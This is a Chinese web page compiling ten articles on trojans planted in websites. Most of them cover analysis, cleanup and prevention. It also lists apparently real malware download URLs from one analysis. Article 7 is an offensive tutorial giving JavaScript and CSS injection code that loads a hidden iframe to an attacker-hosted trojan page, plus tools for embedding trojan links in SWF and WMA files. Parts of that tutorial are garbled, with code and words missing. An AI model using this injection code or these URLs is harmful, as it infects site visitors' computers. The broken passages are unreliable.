欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>网站挂马简要分析 保障个人网络安全

网站挂马简要分析 保障个人网络安全

2022-07-22 08:12:07 收藏本文 下载本文

“小马快跑”通过精心收集,向本站投稿了10篇网站挂马简要分析 保障个人网络安全,下面是小编为大家准备的网站挂马简要分析 保障个人网络安全,欢迎阅读借鉴。

网站挂马简要分析 保障个人网络安全

篇1:网站挂马简要分析 保障个人网络安全

中午,一个朋友问我瑞星个人防火墙是不是误操作把999宝藏网(www.in9.cn)给屏蔽了,他经常去那个坛子,现在每次都得把防火墙关掉才能上去,很麻烦。登陆那个网站看了下,不止瑞星个人防火墙会拦截,安装了卡卡助手,上这个网站的时候也会提示访问的网址可能是一个不良网站。

随即问了相关的同事,告诉我,那个网站确实被挂马,而且之前也被挂过很多次。于是,对那个网站进行了下简单的分析。

1、查看该网站的源代码,引用了几个js脚本,其中有一个是js路径下的global.js。这个脚本全局引用,打开999宝藏网的任何一页都会调用这个脚本。

2、打开www.in9.cn/js/global.js文件,可以看到这个脚本又同时调用了几个脚本。其中有一行调用了pw_tag.js文件。

3、 继续查看这个www.in9.cn/js/pw_tag.js的代码,可以看到一个高为1的iframe引用,应该是比较明显的挂马或带流量广告的迹象。

而xu.html文件里又有一个iframe,引用“ads.html”文件。

4、 查看www.cnnz8.cn/ads.html,是一个加密的网页。

把代码最后一句window[“x65x76x61x6c”] (t);改成ss.value=(t),在页面的最前面加[textarea id=ss],能够得到解出的页面,

5、 从解出的页面中可以得到几个地址:

www.360safee.net.cn/1.html

www.360safee.net.cn/x.html

www.360safee.net.cn/r.html

www.360safee.net.cn/nr.html

www.360safee.net.cn/Baidu.cab Baidu.cab文件直接就是木马,瑞星报Trojan.Win32.Undef.ggv 1.html

下载www.8yumen.cn/hello.exe,瑞星报Trojan.Win32.Undef.ghz x.html

下载www.chinaz8.cn/hello.exe r.html 下载 www.chinaz8.cn/hello.exe nr.html

下载www.chinaz8.cn/hello.exe 几个下载地址下载的文件相同。去那个论坛随便逛了逛,也有坛友反应被瑞星防火墙屏蔽的事情,一个管理员的回复差点雷死我。 截止到发Blog时,该网站挂马扔没被清除。真不知道这时候是面子重要还是坛友的电脑安全重要~~~

篇2:浅析网站如何保障网络安全

网站如何保障网络安全,那么这里向你介绍了如何保障网络安全的问题由来以及具体的措施,那么如何保障网络安全呢?还是要在细节上入手,一步一步强化,下面我们来看看如何保障网络安全的一些细节,

一、如何保障网络安全的安全隐患分析:

1、服务器上用的是私有的操作系统和数据库,所谓私有,并不是完全自己写,而是说,全部都是进行私有化改造过的,一般使用开源的操作系统和数据库进行改造,比如说操作系统使用free bsd的改,数据库使用mysql的改,网站服务器数量上百时开始实施这个工程的网站比较多,费用是很重要的一方面原因,但更重要的是安全因素。防火墙不仅昂贵,而且会严重降低效率,所以他们一般不会考虑。

2、改造操作系统的时候,除通信所需的一些命令文件保持原名外,很多命令文件连文件名都换掉(有人认为这是小花样,呵呵),大量功能被重写, 即使拿到权限坐在服务器面前,也取不到数据。

3、有网站首席安全官认为放一扇门让别人一个劲砸,不如给人两条路让人选择正确的或者不正确的,所有使用错误帐号和密码去试系统的人,都会被允许以匿名身份登录到一个shell里,那个shell跟真的系统很象,嗯,只是很象,但其实是个空壳,所有的指令,都会被以最小代价运行,调用假的信息界面出来。有的甚至里面放了陷阱,欺骗性引导 自动送上身份资料或其他一些敏感信息,毕竟 可能通过境外跳板过来,如果不是 主动送上,网站方很难获得 身份资料的。

4、使用自己的安全策略,对已有的攻击手段都有相应的防护措施。比如说对syn flood这样的,就是临时降低服务质量,降低半连接等待时间,这样连接的成功率会降低,但是不会造成服务被停,

5、网络空闲时间经常有欺骗性数据流在办公网络和服务器之间流动,使用强度不高的加密方式加密,让 有事做。

6、网站内部工作人员使用业务系统登录网站服务器时,界面上和一般服务器一样,所有的一般命令都可以通过业务系统转换为私有操作系统的专用命令而得到执行,网站内部工作人员也只有很少的知道转换的对照,而且一般都经过分权,做操作系统开发的,不负责服务器的维护,并且不知道安装某个内部版本号操作系统的服务器被部署到什么地方。

二、如何保障网络安全的方法简介:

1、帐号及密码按规定必须通过安全的消息平台传递。

2、有自己部署在不同城市的DNS服务器,所有部署出去的应用都有不在同一机房的备用系统,应急机制设置在自己的DNS服务器这一环节,使用承载其他服务的服务器做交叉的安全状态监测,比如说A1服务器是A服务器的备用系统,使用CDEFGH等服务器来做A服务器安全状态监测,定时通信,并向A1服务器传递通信成功的信号,当失败率超过某个值的时候,A1自动分担A的部分压力,A1服务器上原本承担的非及时服务(不面向客户的,比如说索引服务)被降低优先级。所有服务器之间这么相互监测,通过某个机制保证监测是及时有效的。这样的情况下,即使某家DNS服务商被攻击,自己的网站都还能被大部分用户访问,因为不同地区的DNS还没被刷,用户还是可以使用那些DNS连接到网站的。

一般而言,使用了这些手段,网站的安全性不能说万无一失,也是大大提高的。

对于网站如何保障网络安全的问题其实一项系统的工作,需要做好每个细节的安全举措,那么以上所述旨在向你抛砖引玉,希望能找到适合自己的网络安全防范方法。

篇3:网站挂马

实现在很多人说到挂马,还是比较担心自己的安全,毕竟现在太多的牛人来打造免杀木马,但是我却不把这些木马放在眼里,为什么?听我细细道来,一个木马下载到本地,运行并且关联到注册表中,前提还是一个权限问题,其实很多木马本身就不具备权限这个概念,完全是依赖你系统用户的权限来运行,调用木马的用户具备什么权限那么木马本身就具备什么权限,这个道理我想大家都明白吧,

这里牵扯到一个权限依赖的问题,举个简单的例子,一个恶意网页,用一个具有管理员权限的用户去访问马上就中,但是用一个游客用户去访问却什么事都没有,这就是所谓的权限依赖问题。

大家现在应该清楚我不怕网站挂马的原因了吧,就是利用权限来防御,我在这里建议大家上网时最好不要用具有管理员权限的用户,但是你硬要使用也可以,但是你要设置一番,设置两个具有管理员权限的用户,一个用来安装程序,一个用来上网,安装程序的那个用户不用设置什么权限,但是上网的这个用户却要好好设置一番了,Windows目录(只是windows本身的目录不包括子目录)及system和system32目录设置上网的那个用户只具备读取权限,这个用意我想大家都清楚吧,然后是注册表的权限,设置注册表权限也是一个重点。

注意:的注册表权限设置和XP/不一样。另外还有一些键值。

HKEY_CLASSES_ROOT exefile shell open command

HKEY_CLASSES_ROOT txtfile shell open command

HKEY_CLASSES_ROOT inffile shell open command

HKEY_CLASSES_ROOT inifile shell open command

以上4个键值是一些常用文件的关联

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer Advanced Folder Hidden SHOWALL

这个键值是关于系统隐藏属性的

HKEY_CURRENT_USER Software Microsoft Internet Explorer Main

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Internet Explorer Main

这两个键值是系统默认主页的

HKEY_USERS .DEFAULT Software Policies Microsoft Internet Explorer Control Panel

这个键值是关于使更改默认主页按钮为灰色不可用的

HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Run

HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion RunOnce

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Run

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion RunOnce

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion RunOnceEx

以上键值是关于自启动文件的

HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services

这个键值是关于系统服务的,

以上这些键值在你对系统设置好以后再去取消用户的完全控制权限,只给予用户读取权限这只是一部分,比较常见的,当然不是全部。如果大家还有什么其他的见解请请一起来讨论下吧。

其实不知道大家注意到没有,对于一些顽固的文件也可以用权限限制来进行删除,比如在正常模式及安全模式下都无法删除的文件,但是在这些文件在DOS下却很容易就删除了,原理很简单,那就是系统在启动时是用户本身或系统去调用那个文件导致删除不成功,但是我们不允许任何用户去访问这个文件呢,先把这个文件的全部访问用户都删除,然后重起后再给予这个文件用户的完全控制权限来进行删除,有的文件在注销后就可以删除了,但是我在这里还是建议大家重起后再进行删除。

篇4:个人网站被挂马的解决方法

做站的朋友都有过网站被挂马的经历,说实话,我对这种行为非常反感,因为我的网站赚钱指南(melejia.com)开通不到2个月,就发现被挂马了,当时花费了我一个晚上的时间才清除了木马,又累又气,后来又被挂了两次,好在有了经验,不用花费多少时间就搞好了。对于网站被挂马,我认为最好的办法还是“防”为主,建站系统最好用正规的(我用的是动易),不断按要求加补丁程序防漏洞,还有,后台密码尽量设置复杂一些,电脑系统也要加强,比如装上防木马软件,杀毒软件等(我用的是360安全卫士)。反正有网络就有木马,病毒程序层出不穷,站长们要非常小心!下面是站长解决中马的方法(仅对动易系统):

已中木马的动易系统网站全面解决办法

如果你发现你网站已经中招(大部分表现为被人插入iframe代码,首页或者每个页面),可以参照以下办法进行处理:

1、打上最新安全补丁!!!。

2、对比动易所有的文件,发现多出来的文件,立即下载备份(供分析用)然后从站点中删除!如果是文件大小、日期不一致的,编辑该文件,看是否有不良代码。 比较喜欢在conn.asp和config.asp里面放不良代码。如果发现有,先删除。最近还发现很多木马代码 入到了JS文件中,建议直接用动易程序原JS目录覆盖一次网站的JS目录。然后上传动易官方最新文件替换。conn.asp上传后,记得将数据库路径修改正确。

3、查看所有的JPG,GIF文件名,凡是发现带asp文件名的,立即下载备份(供分析用)然后从站点中删除!( 比较喜欢在admin/image/......这种地方藏木马,曾经有一位站长的站就被人在这个目录下建立了一个.asp的目录,里面再放一个JPG木马文件。

4、以上2、3步骤是检查木马程序文件,完成后,就该检查后台模板了。首先当然是立刻修改管理员密码(能动你模板说明就能进你后台了),接着查看站内日志是否有非法登陆或者是日志被删除了,然后在模板管理中,用查找替换模板的方法,查询你网站页面 入的那个iframe代码,

5、停止网站所有的上传功能,检查所有会员名,发现带asp的(包括*.asa、*.cdx、*.cer),全部删除(请自行斟酌,为了网站安全,损失点也没办法),同时,在网站选择题那设定禁止注册:asp 这样的会员。

6、如果你网站的数据库使用的是默认的Database/PowerEasy.mdb数据库路径和文件名,请立即更改!切记!

7、登陆后台后网页一片空白的处理方法,用对应版本原始的admin文件夹覆盖你的管理目录中的文件,并将目录中多出来的文件删除掉。如果后台菜单栏点不开的,请重新上传文件/JS/prototype.js。

8、登陆时提示验证码不正确的,一般表现为验证码多了下划线。请用原始的动易文件覆盖你网站根目录上的images文件夹下面的几个后缀为fix文件,以及/inc eckcode.asp文件。

9、最好重新生成所有的HTML文件以及所有的JS文件。

10、以上方法都试了还不行,那就备份数据库,然后删除全站,再重新上传。

下是:rhongsheng 提供的一个方案:

-------------------

1.修改/inc ecklist.asp文件中的94行,在其中加入Or InStr(iname, “.”) > 0 。该代码起到注册是限制注册用户名包含有“.”。或者在其中限制包含“asp”也可以Or InStr(iname, “asp”) > 0。可以两者一起限制。经过本人测试,限制之后eval后门执行程序起不了做用。

------------------

以上办法供参考,有更多措施将进一步补充完善。

另外,需要补充一下的是:

1.动易系统内自带的“禁止注册的用户名”中即使加了.asp|asp|限制都依然可以注册,所以为防止出现意外,建议暂时关闭会员注册,或根据以上的临时修改方案暂时解决。

2.假如你网站的数据库使用的是默认的Database/PowerEasy2006.mdb数据库路径和文件名,请立即更改!切记!

祝你的站天天平安,流量不断!

篇5:关于网站挂马的处理

12月18日,发现自己的网站被挂马了,当时心里一慌,立即检查了一下源代码,发现并没有可以的代码出现,于是稍微放松了心态,不久,一个朋友发来QQ消息说我的站被GG闭屏了,这回我慌了,立刻在GG上SITE了一下我的网站,竟然提示“该网站含有恶意代码”字样,原来网站还真的有木马,于是我开始检查自己的网站程序,从JS文件,PHP文件等等找起,终于在一个ad_js.php这个文件上找到了一条恶意代码,心里一阵窃喜,删掉,保存。本以为打工告成,可一想,不可能就这么一条木马吧,为了安全起见,我用DW开始批量查找代码,发现在好几个JS文件上存在木马,批量替换掉。重新生成一下页面。终于松了一口气,退出服务器,开始更新内容,大概过了半小时,当我打开页面的时候发现网站又被挂马了,再次进入服务器,找到刚才的那几个文件,发现同样的代码,同样的位置,又出现了~~这回我意识到网站肯定存在后门,没办法,找后门是一件最头痛的事了,为了安全起见,保存图片文件和数据库,全部删掉,重新安装程序,搞了半天,终于搞好了~,打开网站,终于不再出现木马提示,

第2天一大早,打开网站,又出现了木马提示,真的崩溃,换了程序还是被挂马,难道程序有漏洞?于是开始搜索一些关于挂马的知识,无意中发现图片挂马。再次搜索一些GIF,jpg格式的图片文件,一个一个打开,查找,发现有2个gif文件打不开,于是用记事本打开发现里面有条可疑的代码,一定是木马,于是删掉保存。为了安全起见,我把网站的html,data,等几个文件改为只读,大功告成,这回应该不会被挂马了

观察了几天,发现网站没有再被挂马了~这回终于可以安心做网站了希望各位站长照顾好自己的网站,发现问题要及时处理,还得彻底根治哦!

篇6:六招预防网站被挂马

招预防网站被挂马:

一、查看源文件与首页相关的CSS和JS文件,

这一招是最基础,最老土,但是最实用的一招了。查看首页代码多数人都明白。但是很多人并不在意CSS文件和JS文件。熟不知现在这两种挂马方式正在大行其道。

经常有站长反应自己的网站报病毒,但是首页里面并没有马。其实如果你细心一点看看,木马多数时间都隐藏在CSS和JS文件里面。

二、定期修改ftp的用户与密码。

这个我想不用多解释了吧,这也是个习惯问题。现在的网站系统漏洞不多了。想入侵系统难,但是想爆出个FTP密码来相信不少人还是能作到的。奉劝那些用纯数字作密码的站长兄弟们修改一下自己的密码,因为现在新出的纯数字密码穷举器,九位的密码能在两个小时内破出来。。。

三、注意首页及重要页面生成时间。

有很多网站,特别是ZF机关类网站多数情况下很少更新,而这些机关部门人员,如果你告诉他如何去查看源代码,估计那也是一件很难的事情。但是如果你让他看一下“文件创建时间”“文件修改时间”,这个他们应该会。如果经常几个月不更新网站,而“文件创建时间”“文件修改时间”就在这几天的话,那就很说明有问题了。

比较重要的文件,比如模版文件,CSS文件,JS文件最好都看一下。

四、经常升级一下自己的CMS系统,

现在正里八经的网站一般都是用比较成熟的CMS系统作的,比如DISCUZ、DEDECMS、PHPCM、PHPWIND之类的。这些系统在进后台之后一般都有新版本升级的提示。

这些提示最好是看一下。有的时候都是一些漏洞升级。必要的话经常升级一下。

再一个就是常用CMS系统的后台目录一定要修改。千万不要小看这一点,用一个inurl命令可以在百度或者GG里面搜索出N多后台目录来.

五、程序设置定时重新生成一下首页。

一般网站被黑,多数人会选择与直接写入首页。但是正规CMS都是用生台模板来生成网站首页的。如果设置每天某个时间定时重新生成一次的话。即使被黑,被挂马了。也会自动被系统覆盖掉的。

六、异地备份整站或者数据库

开篇的时候提到了,我的亲亲传世网因为数据库是ASP的,惨被写入木马。直接挂了整站。

经常备案数据库——异地备份。一定要把重要备份放到自己的电脑上或者移动硬盘上。

这个太重要了,特别是ASP类的数据库。如果没有备份,遇上这样的事情那直接崩溃了。

再补充一下就是经常跟你的主机空间商联系一下。有的时候整个服务器出了漏洞。或者其它网站有问题连累到你也说不定。

基本就说这么多吧。希望以后不再出现网站被挂马的情况。

是充满杯具的一年,希望所有的站长兄弟们都能有点收入。

并且祝所有站长朋友正月十五元宵节快乐!

篇7:跨站挂马全攻略网站安全

文章作者:a1pass

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

原始出处:a1pass.blog.163.com/

文章备注:本文发表于《 X档案》第5期,与原文有少许出入,

现在的 攻击手法中,跨站挂马似乎正在逐渐成为攻击的主流话题,鉴于这种形势,俺就把我学习跨站挂马的一点心得总结出来与大家分享。

由于考虑到知识的认知过程以及入门朋友们的技术底子问题,本文将分为“基础知识”、“跨站漏洞”与“挂马技巧”三部分组成,咱们先来学习一下基础知识,以及跨站攻击的利用方法。

一、基础知识

1、什么是UBB码

XSS攻击主要在两种环境下进行,一个是用户自己构造的比标签,构造者汇总标签要严格遵循HTML标记语言,而UBB码是HTML的一个变种,属于系统提供的标签。UBB代码简单,功能很少,但是由于其TAG语法检查实现非常容易,所以许多网站引用了这种代码,以方便广大网友的使用,当然,同时也为我们打开了方便之门。

下面我列出几个例子,以便大家对UBB码有一个感性的认识。

显示为粗体效果:文字

显示为斜体效果:文字

显示文字的超链接:[URL= www.hackerxfiles.net/] X档案官方站[/ URL]

通过上面的例子,我们可以看出来UBB码用的是中括号标签“[”与“]”。

为什么介绍这些?因为关键时候,我们借助UBB码也可以达到跨站的效果。

2、什么是HTML输入

大家看到这的时候,有条件的可以打开X档案的网站看看,我们在IE浏览器的页面中单击右键,选择“察看源文件(V)”选项,如图1。

001.jpg(100.62 KB)

-8-3 07:09

然后就会弹出如图2那样一个以首页文件命名的记事本。

002.jpg(213.03 KB)

2008-8-3 07:09

我们可以看见里面的代码都是用“<”与“>”括起来的,而这个“<”与“>”分别就是HTML的开始与结束标记。例如我们输入、<“width=”120“ height=”120“ />三个单独的语句,我们可爱的

&{[code]}

[N4浏览器]

[IE浏览器]

[N4浏览器]

[N4浏览器]

[IE浏览器]

[Mozilla浏览器]

[IE浏览器]

[IE浏览器]

[xCO][xBC]script.>[code][xCO][xBC]/script.>

[UTF-8;IE;Opera浏览器]

上面的内容是我参考安全焦点出版的《网络渗透技术》做的摘录。

五、挂马技术

对于挂马,强烈要求大家带着学习的目的去钻研,不要拿出去害自己的同胞……

1、什么是挂马

最近看中央电视台的一个有关于 的节目,字幕上竟然把“挂马”显示成“挂码”!估计是对 技术不了解所致。但是也可以看得出来大家对于挂马技术的陌生。

其实通过名字就可以知道一二,挂马就是指一种将木马程序“挂”到大家比较信赖的网站上,从而使得浏览此网站的网民电脑被非法植入木马的行为。

如果挂马技术比较成熟,被挂马的网站服务人员与浏览此网站的网民一般很难察觉!所以说挂马具有隐藏性好,危害巨大的特点,大家试想一下,如果百度首页被挂马,那么后果会怎样?只需1天就会有上千万人的电脑被非法控制!

2、挂马的原理

关于挂马技术,与XSS基本一致,但貌似比XSS技术的门槛低。而就夸马的方式来说,一个是通过漏洞挂马(例如XSS),一个是通过拥有的绝对权限挂马,例如我们利用WEBShell进行批量挂马。但是不管是利用什么方法,只有我们有良好的挂马代码才会获得比较好的效果……

挂马的基本思想就是利用本地溢出漏洞构造下载执行的ShellCode,从而下载并执行指定的程序,如图8。

008.JPG(84 KB)

2008-8-3 07:09

关于溢出漏洞,可以是IE本身存在的漏洞,可以是与IE有联系的漏洞,例如WORD、FILASH、WMA音频等等,

3、挂马实战

挂马于XSS一样,都有一个“基本代码”,而挂马的基本代码则是:

< iframe.>

通过上面的学习,相信入门的朋友对HTML已经有点了解了吧?我们可以看到这是一个包含< ifarme>标签的代码,< ifarme>标签是用来在网页内嵌入另一个页面的,如图9就是一嵌入页面。

009.jpg(134.7 KB)

2008-8-3 07:09

通过代码我们很容易就能知道他嵌入的是一个宽[width]为500像素,高[height]为100像素的页面,通过对比,我们可以发现本文例子的宽和高都是0,这就起到了隐藏访问木马网页的目的。

但是现在稍微有点安全常识的人都知道查找关键字ifarme了,所以要实行有效的挂马,最好是使用其它的挂马技巧。而另外一个常用的方法就是JS挂马了,这里的JS和我们上面谈到的JavaScript一样,JS挂马当然是先创建JS文件,我们先建一个记事本,将以下代码输入到里面。

Top.document.body.innerHTML = top.document.body.innerHTML +’rn< iframe.>’;

然后依次选择“文件”>“另存为(A)…”保存为.js文件,如图10。将其上传到你所能控制的服务器中。

010.jpg(48.99 KB)

2008-8-3 07:09

现在我们只要在那个网页中插入< script

src=你的JS文件保存地址>,以后只要有人浏览这个页面就会偷偷的转向我们JS文件里的www.***.com/muma.htm,从而达到挂马的目的。

这种方法很好的避开了关键字ifarme,只要我们的JS文件的名称起的具有迷惑性,一般的应该都可以蒙混过关。如果还想要更加隐蔽的方式,那就只有使用CSS来挂马了。

通过上面的文章大家应该对CSS有所了解,CSS是层叠式样式表的简称,也就是说我们可以利用层叠式样式表来挂马,熟悉网页设计的都知道,凡是比较复杂漂亮的页面,一般都要用到层叠式样式表,而且层叠式样式表的代码繁杂,从而有效地掩护了我们的挂马代码。

我们只要在CSS文件中包含以下代码即可。

Body{

Hytop: expression(op.document.body.innerHTML = top.document.body.innerHTML +’rn< iframe.>’;);

}

然后在我们要挂马的页面引用这个CSS文件就可以了,引用代码如下。

有了这三种方法撑腰,你的网马挂的应该算是比较成熟了,但是除此之外,我们还有其它比较另类的挂马方法,正可谓剑走偏锋,出其不意!

第一个要介绍的就是“臭要饭的”写的“IcodeToSWF”,它可以将我们的网页木马地址插入到SWF文件里,当别人兴高采烈的观看动画时,他已经成为我们粥中的肉鸡了!

关于IcodeToSWF的使用方法非常简单,我们代开文件后选择需要插马的SWF文件,然后输入我们的目马网址点击“给我插”就可以了,如图11。

011.jpg(85.92 KB)

2008-8-3 07:09

最近总是听说网易博客中毒了!一听吓我一大跳!网易的BLOG还没智能到可以运行病毒的程度吧?最后经过调查发现,原来是WMA文件 了木马!

于是乎淘到了一款傻瓜化的WMA插马工具,我们只需输入木马地址与音乐地址保存即可,如图12。

012.jpg(48.49 KB)

2008-8-3 07:09

不过这个工具毛病很多,例如WMA音乐的地址最好手动输入,不要粘贴,否则会出问题……

关于挂马就想讲到这里了,结束前在告诉大家一个技巧,关于HTML文件远程访问时我们可以将后缀名改为其它的,例如www.***.com/muma.jpg或www.***.com/muma.abcd都可以正常执行!除了HTML文件,JS文件也可以这样随意改动后缀名,甚至无后缀名都可以!

关于挂马,我最后要说的一句话就是“害人终害己”,切记!

到这里文章全部结束了,本想讲的更加详细一些,涉及的更广一些,但是想到憧憧不知的菜鸟们,使我努力将文章难度降低,以便于入门朋友的学习。关于这片文章,入门的朋友们不要看到代码就头大,其实大多数只是改个网址就可以应用的,为了方便广大读者,我已经将本文涉及到的所有应用代码整理初来,详情请见光盘。

由于时间仓促,本文难免有错误之处,还请广大读者指正!我的ID是a1pass,大家可以到邪恶八进制的论坛找我。

篇8:防止网站被挂马的基本原则

防止网站被挂马的基本原则

1. 服务器安装杀毒软件及专业木马防护软件,及时修补服务器系统漏洞,

2. 网站后台管理用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。

3. 尽量使用正规的asp 网站管理程序,并修改默认数据库名称和存放路径,数据库文件名不要太简单。

4. 及时更新网站程序,不要在网页上加注后台管理程序登录页面的链接。

5. 时常备份网站整站程序、数据库等,数据库文件不要使用.asp 后缀。

6. 定期检查网站源文件,清除网站程序中来历不明的asp 文件。

7. 一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件,

8. 借助 工具,经常检查一下您的网站程序,看看是否有漏洞注入。

当然, 入侵与反入侵是一场永不停歇的战争,网站管理人员只有做好各种防范措施,不断加强服务器和网站的安全管理,才能更有效地防止或减少网站被挂马的可能。

前段时间,客户的上级主管单位对客户单位的整个信息系统进行了一次全面的主机脆弱性分析。由于客户单位的信息安全性要求较高,这次脆弱性分析也做得非常全面,找到了很多安全漏洞,尤其是对网络中的Windows 主机更是提出了大量的整改意见。

在落实这些整改意见、修复主机漏洞的过程中,笔者发现涉及的计算机非常多,工作量很大,靠人力逐台计算机去操作基本上是不可能的。这时, 笔者想到了Windows 系统中强大的管理工具——组策略。利用组策略批量更改配置的特性,配合计算机启动脚本的使用,整个安全修复工作仅用一天时间就完成了,如果靠人力逐台计算机的去操作可能要花费至少一个月的时间。

篇9:网站流量欺骗和挂马新手段

近日,笔者接到一些网友的诉苦,说使用代理IP访问网站时,总是莫明其妙地跳到别的网站,当去掉代理IP时,访问网站又恢复正常,并有些更甚的,使用代理IP访问网站时,电脑经常中毒。

针对这个问题,笔者对此事做了一下研究。

首先,选择一个资源丰富一点的代理网站,收集大量可用的代理IP,我到无名指代理论坛bbs.8558.org收集了一千多条网友刚发到的http代理。

代理收集完之后,开始测试了,首先,写了一个专门的批量测试工具对所有选择的代理进行测试,测试方法和网上通用的方法一样,使用程序通过代理访问百度。如要返回的网页源码中有百度网页上的源码,我们就视为正常可用的代理IP。

同时,对每个测试正常的代理,访问网页时得到的网页内容全部自动保存下来。

好,下面我们看看对一千多条代理测试后的结果。

首先,我们得到了所有代理测试成功后的信息,并作为网页文件保存起来了,如图1所示。

图1保存代理测试成功后的信息

注意仔细看一下,这里我们得到的文件是大小不一的。所在代理都是访问百度网站测试出来的,理论上应该是,所有文件内容应该是同一大小,都是百度网站的网页代码大小才对,

为什么会这样呢,我们又带着疑问进行下一步。

我们先用一个文件大小和百度不一样的代理试试看(百度首页文件代码大小为3KB左右),我们选了这么一个代理,在IE上进行了设置(如图2)。

图2选择代理并进行设置

设置后后,我们来访问中关村在线网站www.zol.com.cn ,在浏览器上输入中关村在线网址。

图3输入中关村在线网址

情况出现了,我们并没有如愿访问到中关村在线的内容。而是出现了这么一个网站(如图4)。

图4出现非目的网页

为什么会这样呢。这就是代理服务器。使用技术手段,在接受收访问的时候,载入受访问网址的内容将其隐藏起来,或迅速跳转到其它欺骗流量的网站。

在测试代理IP的过程中,我们还发现了另一个有趣的问题,就是百度被报有毒,我们再来看看图5。

图5检测到百度有病毒

这就是在测试代理时,使用代理访问百度网站,而被代理服务器载入了其它一些恶意代码到百度的网页中。并不是真的百度有毒。而是代理服务器在作怪。

篇10:博客网站发生大规模页面挂马

博客大巴、中国博客网等博客网站发生大规模页面挂马!

当日安全综述: 据瑞星云安全系统统计,昨日共有3,883,649人次的网民遭到网页挂马攻击,瑞星共截获了1,200,860个挂马网址,比昨日略有下降,

博客网站发生大规模页面挂马

【网站挂马简要分析 保障个人网络安全】相关文章:

1.网络安全保障工作总结

2.网络安全保障工作整改报告

3.劳动保障个人工作总结

4.劳动保障个人总结

5.详谈:企业需做好保障无线网络安全的措施

6.网站优化关键词比重分析是什么

7.网站运营之思维模式分析

8.网站客服个人年终总结

9.劳动保障监察员个人工作计划

10.劳动保障季度个人总结

下载word文档
《网站挂马简要分析 保障个人网络安全.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

  • 返回顶部